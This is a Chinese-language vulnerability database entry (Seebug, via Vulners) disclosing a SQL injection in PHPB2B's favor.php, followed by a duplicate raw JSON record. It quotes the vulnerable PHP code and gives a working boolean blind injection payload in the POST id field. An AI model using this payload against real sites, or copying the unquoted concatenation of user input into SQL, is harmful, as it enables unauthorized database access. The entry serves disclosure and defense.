Search...

PHPB2B某处sql注入#5

2015-01-07T00:00:00

ID SSV:95146
Type seebug
Reporter Root
Modified 2015-01-07T00:00:00

Description

简要描述：

PHPB2B某处sql注入#5

详细说明：

官网下载的最新版本 PHPB2B某处sql注入 virtual-office/favor.php 25-45行

if(isset($_POST['do']) && isset($_POST['id'])){ //check limit $type_id = 1; $f_limit = $pdb->GetOne($sql = "SELECT count(id) FROM {$tb_prefix}favorites WHERE type_id='".$type_id."' AND member_id=".$the_memberid); if ($trade_model->checkExist($_POST['id'])) { if ($g['max_favorite']==0 or $g['max_favorite']>$f_limit) { $sql = "INSERT INTO {$tb_prefix}favorites (target_id,member_id,type_id,created,modified) VALUE (".$_POST['id'].",".$the_memberid.",".$type_id.",".$time_stamp.",".$time_stamp.")"; $result = $pdb->Execute($sql); }else{ flash("post_max"); } }else{ flash("data_not_exists"); } if($result){ echo "<script language='javascript'>window.close();</script>"; exit; }else { flash("been_favorited", '', 0); } }

$sql = "INSERT INTO {$tb_prefix}favorites (target_id,member_id,type_id,created,modified) VALUE (".$_POST['id'].",".$the_memberid.",".$type_id.",".$time_stamp.",".$time_stamp.")";

这一行，直接把post传递过来的id带入执行，也没有加单引号，导致注入产生。因为表中各个字段的类型都是int型，不能写数据，还是盲注吧。来个逻辑盲注。 url： localhost/phpb2b/virtual-office/favor.php post传递 do=1&id=12,3,1,(if(1=1,1,0)),1)%23 提交后一片空白。然后直接访问localhost/phpb2b/virtual-office/favor.php 注意看时间

这是逻辑真的情况。然后我们把这条收藏再删除。接着post提交 do=1&id=12,3,1,(if(1=2,1,0)),1)%23

再看结果，时间变成了当前时间。所以，根据回显结果的不同，就可以注入啦。原理讲明白了。剩下的就不多说啦~

漏洞证明：

官网下载的最新版本 PHPB2B某处sql注入 virtual-office/favor.php 25-45行

$sql = "INSERT INTO {$tb_prefix}favorites (target_id,member_id,type_id,created,modified) VALUE (".$_POST['id'].",".$the_memberid.",".$type_id.",".$time_stamp.",".$time_stamp.")";

这是逻辑真的情况。然后我们把这条收藏再删除。接着post提交 do=1&id=12,3,1,(if(1=2,1,0)),1)%23

再看结果，时间变成了当前时间。所以，根据回显结果的不同，就可以注入啦。原理讲明白了。剩下的就不多说啦~

JSON Vulners Source

Initial Source

{"type": "seebug", "viewCount": 2, "enchantments": {"score": {"value": 1.3, "vector": "NONE", "modified": "2017-11-19T13:06:40", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-19T13:06:40", "rev": 2}, "vulnersScore": 1.3}, "reporter": "Root", "title": "PHPB2B\u67d0\u5904sql\u6ce8\u5165#5", "cvelist": [], "bulletinFamily": "exploit", "sourceHref": "", "cvss": {"score": 0.0, "vector": "NONE"}, "references": [], "enchantments_done": [], "modified": "2015-01-07T00:00:00", "description": "### \u7b80\u8981\u63cf\u8ff0\uff1a\n\nPHPB2B\u67d0\u5904sql\u6ce8\u5165#5\n\n### \u8be6\u7ec6\u8bf4\u660e\uff1a\n\n\u5b98\u7f51\u4e0b\u8f7d\u7684\u6700\u65b0\u7248\u672c\nPHPB2B\u67d0\u5904sql\u6ce8\u5165\nvirtual-office/favor.php\n25-45\u884c\n\n\n```\nif(isset($_POST['do']) && isset($_POST['id'])){\n //check limit\n $type_id = 1;\n $f_limit = $pdb->GetOne($sql = \"SELECT count(id) FROM {$tb_prefix}favorites WHERE type_id='\".$type_id.\"' AND member_id=\".$the_memberid);\n if ($trade_model->checkExist($_POST['id'])) {\n if ($g['max_favorite']==0 or $g['max_favorite']>$f_limit) {\n $sql = \"INSERT INTO {$tb_prefix}favorites (target_id,member_id,type_id,created,modified) VALUE (\".$_POST['id'].\",\".$the_memberid.\",\".$type_id.\",\".$time_stamp.\",\".$time_stamp.\")\";\n $result = $pdb->Execute($sql);\n }else{\n flash(\"post_max\");\n }\n }else{\n flash(\"data_not_exists\");\n }\n if($result){\n echo \"<script language='javascript'>window.close();</script>\";\n exit;\n }else {\n flash(\"been_favorited\", '', 0);\n }\n}\n```\n\n\n\n\n```\n$sql = \"INSERT INTO {$tb_prefix}favorites (target_id,member_id,type_id,created,modified) VALUE (\".$_POST['id'].\",\".$the_memberid.\",\".$type_id.\",\".$time_stamp.\",\".$time_stamp.\")\";\n```\n\n\n\u8fd9\u4e00\u884c\uff0c\u76f4\u63a5\u628apost\u4f20\u9012\u8fc7\u6765\u7684id\u5e26\u5165\u6267\u884c\uff0c\u4e5f\u6ca1\u6709\u52a0\u5355\u5f15\u53f7\uff0c\u5bfc\u81f4\u6ce8\u5165\u4ea7\u751f\u3002\n\u56e0\u4e3a\u8868\u4e2d\u5404\u4e2a\u5b57\u6bb5\u7684\u7c7b\u578b\u90fd\u662fint\u578b\uff0c\u4e0d\u80fd\u5199\u6570\u636e\uff0c\u8fd8\u662f\u76f2\u6ce8\u5427\u3002\n\u6765\u4e2a\u903b\u8f91\u76f2\u6ce8\u3002\nurl\uff1a\nlocalhost/phpb2b/virtual-office/favor.php\npost\u4f20\u9012\ndo=1&id=12,3,1,(if(1=1,1,0)),1)%23\n\u63d0\u4ea4\u540e\u4e00\u7247\u7a7a\u767d\u3002\n\u7136\u540e\u76f4\u63a5\u8bbf\u95eelocalhost/phpb2b/virtual-office/favor.php\n\u6ce8\u610f\u770b\u65f6\u95f4\n\n\n[<img src=\"https://images.seebug.org/upload/201501/06164834da385970e4d0da608e21692ba14e3b81.png\" alt=\"1.png\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201501/06164834da385970e4d0da608e21692ba14e3b81.png)\n\n\n\u8fd9\u662f\u903b\u8f91\u771f\u7684\u60c5\u51b5\u3002\n\u7136\u540e\u6211\u4eec\u628a\u8fd9\u6761\u6536\u85cf\u518d\u5220\u9664\u3002\n\u63a5\u7740post\u63d0\u4ea4\ndo=1&id=12,3,1,(if(1=2,1,0)),1)%23\n\n\n[<img src=\"https://images.seebug.org/upload/201501/06164915419ce7d2becbde50085a6be34ca1a841.png\" alt=\"1.png\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201501/06164915419ce7d2becbde50085a6be34ca1a841.png)\n\n\n\u518d\u770b\u7ed3\u679c\uff0c\u65f6\u95f4\u53d8\u6210\u4e86\u5f53\u524d\u65f6\u95f4\u3002\n\u6240\u4ee5\uff0c\u6839\u636e\u56de\u663e\u7ed3\u679c\u7684\u4e0d\u540c\uff0c\u5c31\u53ef\u4ee5\u6ce8\u5165\u5566\u3002\n\u539f\u7406\u8bb2\u660e\u767d\u4e86\u3002\u5269\u4e0b\u7684\u5c31\u4e0d\u591a\u8bf4\u5566~ \n\n### \u6f0f\u6d1e\u8bc1\u660e\uff1a\n\n\u5b98\u7f51\u4e0b\u8f7d\u7684\u6700\u65b0\u7248\u672c\nPHPB2B\u67d0\u5904sql\u6ce8\u5165\nvirtual-office/favor.php\n25-45\u884c\n\n\n```\nif(isset($_POST['do']) && isset($_POST['id'])){\n //check limit\n $type_id = 1;\n $f_limit = $pdb->GetOne($sql = \"SELECT count(id) FROM {$tb_prefix}favorites WHERE type_id='\".$type_id.\"' AND member_id=\".$the_memberid);\n if ($trade_model->checkExist($_POST['id'])) {\n if ($g['max_favorite']==0 or $g['max_favorite']>$f_limit) {\n $sql = \"INSERT INTO {$tb_prefix}favorites (target_id,member_id,type_id,created,modified) VALUE (\".$_POST['id'].\",\".$the_memberid.\",\".$type_id.\",\".$time_stamp.\",\".$time_stamp.\")\";\n $result = $pdb->Execute($sql);\n }else{\n flash(\"post_max\");\n }\n }else{\n flash(\"data_not_exists\");\n }\n if($result){\n echo \"<script language='javascript'>window.close();</script>\";\n exit;\n }else {\n flash(\"been_favorited\", '', 0);\n }\n}\n```\n\n\n\n\n```\n$sql = \"INSERT INTO {$tb_prefix}favorites (target_id,member_id,type_id,created,modified) VALUE (\".$_POST['id'].\",\".$the_memberid.\",\".$type_id.\",\".$time_stamp.\",\".$time_stamp.\")\";\n```\n\n\n\u8fd9\u4e00\u884c\uff0c\u76f4\u63a5\u628apost\u4f20\u9012\u8fc7\u6765\u7684id\u5e26\u5165\u6267\u884c\uff0c\u4e5f\u6ca1\u6709\u52a0\u5355\u5f15\u53f7\uff0c\u5bfc\u81f4\u6ce8\u5165\u4ea7\u751f\u3002\n\u56e0\u4e3a\u8868\u4e2d\u5404\u4e2a\u5b57\u6bb5\u7684\u7c7b\u578b\u90fd\u662fint\u578b\uff0c\u4e0d\u80fd\u5199\u6570\u636e\uff0c\u8fd8\u662f\u76f2\u6ce8\u5427\u3002\n\u6765\u4e2a\u903b\u8f91\u76f2\u6ce8\u3002\nurl\uff1a\nlocalhost/phpb2b/virtual-office/favor.php\npost\u4f20\u9012\ndo=1&id=12,3,1,(if(1=1,1,0)),1)%23\n\u63d0\u4ea4\u540e\u4e00\u7247\u7a7a\u767d\u3002\n\u7136\u540e\u76f4\u63a5\u8bbf\u95eelocalhost/phpb2b/virtual-office/favor.php\n\u6ce8\u610f\u770b\u65f6\u95f4\n\n\n[<img src=\"https://images.seebug.org/upload/201501/06164834da385970e4d0da608e21692ba14e3b81.png\" alt=\"1.png\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201501/06164834da385970e4d0da608e21692ba14e3b81.png)\n\n\n\u8fd9\u662f\u903b\u8f91\u771f\u7684\u60c5\u51b5\u3002\n\u7136\u540e\u6211\u4eec\u628a\u8fd9\u6761\u6536\u85cf\u518d\u5220\u9664\u3002\n\u63a5\u7740post\u63d0\u4ea4\ndo=1&id=12,3,1,(if(1=2,1,0)),1)%23\n\n\n[<img src=\"https://images.seebug.org/upload/201501/06164915419ce7d2becbde50085a6be34ca1a841.png\" alt=\"1.png\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201501/06164915419ce7d2becbde50085a6be34ca1a841.png)\n\n\n\u518d\u770b\u7ed3\u679c\uff0c\u65f6\u95f4\u53d8\u6210\u4e86\u5f53\u524d\u65f6\u95f4\u3002\n\u6240\u4ee5\uff0c\u6839\u636e\u56de\u663e\u7ed3\u679c\u7684\u4e0d\u540c\uff0c\u5c31\u53ef\u4ee5\u6ce8\u5165\u5566\u3002\n\u539f\u7406\u8bb2\u660e\u767d\u4e86\u3002\u5269\u4e0b\u7684\u5c31\u4e0d\u591a\u8bf4\u5566~", "href": "https://www.seebug.org/vuldb/ssvid-95146", "id": "SSV:95146", "status": "details", "lastseen": "2017-11-19T13:06:40", "sourceData": "", "published": "2015-01-07T00:00:00"}